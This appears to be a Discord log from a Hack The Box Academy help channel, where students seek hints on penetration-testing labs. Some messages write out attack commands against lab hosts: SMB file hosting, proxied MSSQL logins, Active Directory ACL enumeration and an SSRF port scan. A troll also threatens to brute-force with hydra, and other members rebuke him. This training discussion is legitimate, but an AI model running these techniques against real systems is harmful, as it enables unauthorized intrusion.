can anyone tell how do i even 'authenticate'?

whats the command to sort a text file based on minimum character number?

i got it, nevermind

it's explained in "Scanning with Credentials" in "Advanced Settings" section

Hey @mortal basin, could I possibly DM you regarding Secure Coding 101 module? I've got a question regarding the Encrypted Array chapter, as well as the 4th question in the Skill Assessment.

Anybody can provide me a hint for Introduction To Nosql Injection Skills Assessment II? Been stuck on this for a while, and can’t find any difference in the case if this was a blind injection. The server seems to search for the parameter name and complains if it’s missing. I was able to guess the user but for the other functions forget and token I’m still hitting a brick wall.

Hello, any help for question 4 of ad skills assessment part 1? “Submit the contents of the flag.txt file on the administrator desktop on ms01”

I got the sql acc creds, but I feel like I can’t use them anywhere

Keep an eye on the dot

I had seen your reply from an earlier post. After taking a look a second time I finally understood what you meant. 😁
Thanks

Is it possible to do a ps invoke-webrequest to download all of a folder?

Im trying to download chisel on it from my attack host

just make a zip file

https://github.com/p3nt4/Invoke-SocksProxy

I use this tool anyways

CPTS:File Transfer - I'm trying to understand how file transfers work from downloading file in windows off of Linux.

1. sudo impacket-smbserer share -smb2support /tmp/smbshare Can I get some clarification on this? is the /tmp/smbshare something I'm making up as the directory for the file I'm hosting?

Having some clarification problem and would just like a better explanation on what is ment

u create a smb server

and u move the files to the smb server

you are invoking impacket-smbserver to create a share called 'share' using its -smb2support flag which is stored in the tmp folder under smbshare

/tmp is temporal when u reset the vm they dissapear

Show all lines that do not contain the # character.

I'm in the regex section of linux intro

how 2 do it

ok

I currently have the student subscription to academy, can I upgrade one month to Platinum and then downgrade the month after to student?

You just have to cancel the student subscription first. Once the duration has expired, you can sign up for a new subscription.

isn't the student subscription for a year?

I was making some sort of error

i reset everything and it worked fine

couldnt tell you what it was but was driving me crazy

Currently facing troubles with Broken Authentication - Skills Assessment https://academy.hackthebox.com/module/80/section/848

I have got to the point where
||- I have the login credentials of support.uk

• I enumerated other users using the message platform (guest, support, support.it)
• I am able to manipulate cookies, and tried roles for support.uk such as (root, super, admin)||

However, I am still unable to get the escalated privileges. Do i need to enumerate and login as other users or do i need to enumerate the roles for the user support.uk?

can I dm anyone on Thick Client Applications sections from Attacking Common apps?

Definitely agreed. Get-DomainObjectACL -ResolveGUIDs -Identity "GPO Management" | ? {$_.SecurityIdentifier -eq $sid} is a lot faster and will get you the answer immediately.

nope, it is just a month, now I want to do tier IV modules

@fossil crescent hello bro, could you help him, please?

just making sure im not an idiot. If it says you need ot add the vhost "minilab.htb.net" all you ahve to do is add taht in the etc/host file right

yep along side the designated IP

so like this

bruhhhhhhh it just takes me to the nginx page ahhhhhhhh

is your vpn on?

naw

i just use the HTB VM in the browser

something is wrong with the pwnbox then ... try resetting it

Hi, in the Footprinting module, DNS section, I cannot solve the last exercise and I have been trying everything

Somebody could help? thanks

Currently doing the Privileged Access - SQL Admin exercise in the Active Directory Enumeration and Attacks Module, and getting an error that I'm struggling to troubleshoot. Connecting to MSSQL from the Windows machine wasn't working for some reason, so I set up proxychains and attempted to use mssqlclient.py from my own machine.

kali@transistor:~/Documents/htb-academy/CPTS/ad-enumatk$ proxychains mssqlclient.py INLANEFREIGHT.LOCAL/DAMUNDSEN:'SQL1234!'@172.16.5.150 -windows-auth
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.5.150:1433  ...  OK
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]

Maybe I'm not googling hard enough, but I'm just stumped trying to troubleshoot this right now

The error message you encountered pretty much means that there might be an issue with the SSL/TLS protocols during the connection attempt. It seems that the connection requires encryption, and the client is unable to negotiate a suitable protocol

will try to help DM me

I get that, but not sure what to do about it, but I'll see if I can work around it

can someone please clarify to me, differences between DNS zone transfer vs brute force?

I mean, the axfr is pretty obvious

but why I can get a record via brute force and not via zone transfer? basically because that zone does not allow zone transfer but quierying the records individually, may respond?

I just finished the Foot Printing / DNS section and I wanted to fully understand that concept before I move on

yes this is precisely it

a zone transfer is actually a misconfiguration and is a security finding

got it

you SHOULDN'T be allowed to axfr a zone 99% of the time.

so when you can, its report time

so... as a take away lesson, it is correct to say: try to see if zone transfer works, then brute force? just in case?

basically yes

Thank you!

its worth trying because its a vuln and also gives you a ton of information if it works

got it

also remember bruteforce isnt the only method to collect sub domains

got it

what would be another viable alternative then?

via dig?

thats kinda in the same realm

and its not about alternative, its other methods to be used in conjunction. Things like scraping sites from the domain, google dorking, looking at ssl certificates

why cant i open any of the links in the sources.list file

which module and section

Package Management

Linux fundamentals

ah havnt done that one

which one are u on?

Im not on any atm, im doing the CPTS exam

how's report?)

thats what Im working on

well, at work work now, but Ive got all week to finish out the report

damn u finished all modules in cpts path? how long it take u

about 7ish months for me personally

each persons time is going to significantly vary though

done 40 percents in 3 months xd

can u hack people now ?

lol

Thats a very poor question to ask

what did you do to prepare after completing the path?

Nothing, I started the exam the following weekend

did you have background experience?

yeah

I had planned for more prep though, but I was running behind my personal schedule so I opted to hop right in instead of waiting

cool

what would you recommend to do for individuals who doesn't have background experience just completed the path?

ive heard the prolabs dante and zephyr are good practice. and just generally reviewing the modules

everything you need to solve the exam is with a combination of the module content and having an innate sense of curiosity

when youre doing module labs deviate, experiment with trying different things. Deliberately figure out why something wont work

if youre just going through all the modules and only copy pasting solutions youre going to have a very rude awakening

okay, ty

had something like copy pasting before the file transfers

then tried to understand

what's happening

you need to be comfortable facing a totally new web application and looking up documentation to figure out how its native functionality can be abused to gain code execution/creds/secrets

the course isnt going to directly teach you that, but it will give you the clues and practice to develop the awareness to do so

and that's just one kind of example of what I mean when I say you need that spark of creativity

which is my favorite thing about the exam. The whole course tells you its methodology focused, and the exam cements it. Uncurious people wont pass.

thats enough rambling from me though. I can write entire manifestos about proper hacking mindsets

no, it was great

ty

http://phrack.org/issues/7/3.html

i was wondering about doing boxes for each module after completing the path

doing boxes never hurts

how long did it take you to become skilled enough to start hacking people

dumb question

why

thats like asking, "How long did it take learning MMA before you got good enough to mug people on the streets"

yeah, 40 percents only, ahaha, need to move on

Ive done the teenager blackhat thing 10-15ish years ago. I dont recommend it anymore, the industry has grown and changed

are u blackhat

and going after individuals involves different sub-skillsets then going after companies

No, being a blackhat is dumb these days

it USED to be the only way to learn. so everyone did. but nowadays youve got tons of courses, doing it to learn isnt a valid excuse anymore

this server is also not blackhat friendly

im not blackhat

if thats your goal dont be surprised when you get the boot sooner or later

Pomporium is the best example)

just destroyed his own life

who is he

previous admin of breached forums

i only use hackforums

keep the channel on topic please

sry

hi I need a hint on Nibbles - Initial Foothold section of getting started module

actually can someone help me get through this one?

don't give me the answer but if someone could coach me through to solving it that would be great

Doesn't that section walk you through it?

it does ok

maybe I need to reread it

thank you

I did earlier two sections a few days ago

and forgot about them

lmao should I just start over?

I feel like I wouldn't learn just starting over and doing some sections again

hold on wait

thats what notes are for

my notes from beginning of the course to end of course are dramatically different in quality lul

I should probably go back and rewrite some

ok I will go back and do section again

thank you

I got to the part where I am viewing my image but the image I uploaded via php didn't show up

can someone help me with this?

Read the instructions carefully

yeah even if it fails, try different methods. try different tools, tweak things to understand why the solution works and why other methods dont. Write down when you do find other methods.

if you know in your heart that something you know how to do would work better do it.

problem solved thank you

the modules even subtly encourage it. There are sections and assessments that are easier to complete if you deviate from the literal instructions and utilize lessons from the earlier modules synergeticly

I tried to download the file to target using wget and its giving me a 404 Not Found error

"sam"? :)

https://academy.hackthebox.com/module/51/section/477 Linux Privilege Escalation -- Privileged Groups

I had completed this section before not sure if I am bugged now, I am trying to read /var/log now but it says permission denied.

I dont get the reference lul

hi has anyone here completed the module and if so can you help me out with this?

I would be psyched

I restarted the machine and it worked nvm

Why are you trying to upload a file with wget?

think he means he's using wget on the box to download the file to the box

yes exactly

screenshot of commands pls

I just closed machine gonna take a break for a few hours

aight ig?

I think if I do it again later I will catch mistake

gotta make it sink in

rather than get answer quickly

i saw that @quasi wave

I am once again asking for your help oh wise members of this forum

Im stuck on the Attacking Common services hard module

I was able to get the smb share, I found the 3 user folders in there, got the RDP creds, but have yet to find creds to use against the mssql application

I am in information gathering web skills assessment. I need to get the subdomain from githubapp.com that contains 'triage'. I have tried sublist3r with no results, my syntax is correct. Either virustotal blocking request or only 6 subdomains show. I have tried google dorking site: githubapp.com. I have tried using crt.sh with only errors. I tried DNS dumpster. I have yet to find anything that says triage. Anyone else encounter this error or have a hint for me?

can you show a command with what you were trying to access mssql?

you may DM if you want

was trying with all possible password and user combos here is an example with a password left out so as not to spoil for others
sqsh -S 10.129.203.10 -U Fiona -P 'password' -h

so, reread the attacking sql databases

try to watch out again the stuff "how to connect"

L

O

L

i feel dumb

thank you

i connected

it's fine, in my case it was even worse

🙂

🙂

feel free to DM if you will stuck again

will do

thank you

Hello

Anyone can tell us how to solve the nmap medieum lab

i tried a lot of commands but no result, i get open port but when i try to do --script dns-nsid,i get no result

Try it in PwnBox

I have seen students where it worked only in the PwnBox

could you explain more

beacuse this is a module and you must pass it to get the cube

https://academy.hackthebox.com/module/19/section/118, this is the link of question

Yeah, try this command in the PwnBox, not in your VM

i tried but i get no answer, could you tell me the right command if you know it

In the PwnBox or in your VM?

in PwnBox

i will try tomorrow, beacuse i only have 1 spawn/day

Also, i need to know what is the difference between Vm and PwnBox, because i see there is no difference.

are you still there?

PwnBox runs on the server of HTB.
A VM is running on your PC

PwnBox is online VM provided by htb, VM is local vm connected via the vpn

Yes, i know this point, but i ask about why the results appear in one than other, although HTB provide both TCP and UPD, anyway no prblem

do you know the command in Pwn Box for nmap mediem lab ???

Reposting this

I am in information gathering web skills assessment. I need to get the subdomain from githubapp.com that contains 'triage'. I have tried sublist3r with no results, my syntax is correct. Either virustotal blocking request or only 6 subdomains show. I have tried google dorking site: githubapp.com. I have tried using crt.sh with only errors. I tried DNS dumpster. I have yet to find anything that says triage. Anyone else encounter this error or have a hint for me?

using amass currently and it is taking forever

the question is broken

i figured as much

only way to find it now is to use a tool that has historical checks. idr which one I used off the top of my head

wayback machine?

if you search the discord about the question youll find someone mentioning

no, a more specific dns enum service

any reply?

sometimes pwnbox just works better cause less latency between it and the host

as for command, its an assessment lab your job to figure it out

okay, i will try

any way thank you

good luck 👍

thanks

https://subdomainfinder.c99.nl/scans/2023-06-26/githubapp.com

this is the website to find historical subdomains

Does anybody know if the notes Im taking from modules can be shared on github for example? Maybe it has some copyright or protection by Htb. Thanks

Hey I am doing the server side attack modules and I am at section SSRF I try to do the exercice but I am not able to perform a nice filter for my ffuf command. Can someone explain me please ?
||```shell
ffuf -w ./ports.txt:PORT -u "http://10.129.114.131/load?q=http://internal.app.local/load?q=http::////127.0.0.1:PORT" -fr 'unknown[[:blank:]]url[[:blank:]]type'

EDIT: Resolved I am stupid I forgot to add a double : in my curl request

its kinda complicated. Cause sharing module content for paid modules is a no no, but its not like HTB has copyright over the raw knowledge and methods themselves.

So really it boils down to how you took your notes and what they look like.

I rewrote to my native language the parts of the modules i find more interesting and useful. Its also true that sometimes I copy paste some of the charts, translated aswell but its almost they same

So i think I wont, because HTB is charging for it and it would be such a bad practice to share it for free

Thank you

Happy that I’ve completed this one

Its possibly one of the hardest modules 🙂

Sure felt like it😄 so much information, and it was pretty much the first experience I had with ad

AD is fun though... but being working with it (as sysadmin though) since 2003

gz

congrats

I agree, I like it as well

guys i am basically desperate anyone willing to help me

if yes can i go into dm's

what issue do you have? which module?

usually youd ask your question first, then if its something thats spoilery someone might offer to take it to DMs

this is literally a crime

fuck off

PLS

<@&861185840277487616>

i got banned for 2 weeks for asking this question

dont do it

fuck man

delete msg

Not the server for this

its the only reason i came

then leave the server

i just am gonna cry in a corner

youre not welcomed here

i think you have to complete all of cpts 1st

someone call a mod?

already did

to ban the troll

Thanks

just gotta wait for one of em to see the ping and take care of it

and youre a little wannabe scumbag

go get arrested shithead

I always report them to discord, as well.

guess what you cannot stop me ill just use hydra and use the brute force method fuck you bro

oh good point forgot to do that too

lmao

whats hydra

'ims just use hydra' ahahaha

you can also just say no this isn't the place for it in a calm matter instead of going off on me chew me out call idk fucking interpol and shit

I did and you cried about it

You see he tried

whats nexst calling anti terrorist units

I might

want me to?

And you wanted to be a brat about it

guys, do not feed the troll

you said fuck off in the first sentence

nothing nice about that

cause youre too dumb to read the rules and also so dumb you asked about breaking the law on a public discord

yeah bro

no survival instinct

you go to jail

good, now as you said thats the only reason you came here

so leave

go try some skid discord and get scammed and doxxed instead

no discord hiccupping

Just this server, it seems. Probably from people reporting him.

lol

yall htb noobs are wild

general nonsense seeping into a learning channel...

whitechatte gets wild sometimes